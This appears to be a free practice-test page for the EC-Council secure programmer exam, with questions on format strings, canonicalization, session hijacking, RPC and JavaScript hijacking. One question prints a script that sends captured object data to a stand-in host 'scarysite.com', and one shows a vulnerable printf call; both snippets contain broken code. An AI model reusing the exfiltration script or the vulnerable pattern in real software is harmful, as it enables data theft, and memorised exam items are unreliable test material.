Online Access Free 312-92 Practice Test

Exam Code:	312-92
Exam Name:	EC-Council Certified Secure Programmer v2
Certification Provider:	EC-COUNCIL
Free Question Number:	99
Posted:	Dec 17, 2025

Rating

100%

Page: 1 / 20
Total 99 questions

Question 1

David is an applications developer working for Dewer and Sons law firm in Los Angeles David just completed a course on writing secure code and was enlightened by all the intricacies of how code must be rewritten many times to ensure its security. David decides to go through all the applications he has written and change them to be more secure. David comes across the following snippet in one of his programs:
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar('\n');
printf("number (%p) is equal to %d\n",
&value, value);
}
What could David change, add, or delete to make this code more secure?

A.Change putchar('\n') to putchar("%s", '\n')
B.Change int number = 5 to const number = ""
C.Change printf(argv[1]) to printf(constv [0])
D.Change printf(argv[1]) to printf("%s", argv[1])

Question 2

Devon is writing the following code to avoid what?
<script language="vb" runat="server">
Sub Application_BeginRequest(Sender as object, E as EventArgs)
If (Request.Path.Indexof(chr(92)) >= 0 OR _
System.IO.Path.GetFullPath
(Request.PhysicalPath) <> Request.PhysicalPath)
then
Throw New HttpException(404, "Not Found"
End If
End Sub
</script>

A.Type safety
B.GET source code path
C.Canonicalization
D.Parent path tampering

Question 3

Travis is writing a website in PHP but is worried about its inherent vulnerability from session hijacking. What function could Travis use to protect against session hijacking in his PHP code?

A.Renew_session_id
B.PHP_id_renew
C.Create_newsession_id
D.Session_regenerate_id

Question 4

When making a RPC function call on the local machine, what function should be used?

A.ncacn_ip_tcp
B.lclrpc
C.get_local_rpc
D.ncalrpc

Question 5

Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to
http://scarysite.com. Travis decides to get back on his production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring = ""
for(fld in this) {
obstring += fld + ": " this[fld] + ", ";
}
obstring += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://scarysite.com?obj=" +
escape(objString), true);
req.send(null);
}
</script>

A.URL tampering
B.URL obfuscation
C.JavaScript hijacking
D.XSS attack

Latest Upload: 107EMC.D-VXR-DS-00.v2025-12-24.q43; 109Splunk.SPLK-5001.v2025-12-24.q37; 105Huawei.H19-308-ENU.v2025-12-24.q74; 105APMG-International.AgilePM-Foundation.v2025-12-24.q74; 121SAP.C-C4H62-2408.v2025-12-24.q81; 108ASHRAE.HFDP.v2025-12-24.q39; 113ISQI.CTFL-UT.v2025-12-23.q13; 123ARDMS.SPI.v2025-12-23.q102; 118Microsoft.SC-300.v2025-12-23.q333; 120PaloAltoNetworks.PSE-Prisma-Pro-24.v2025-12-23.q39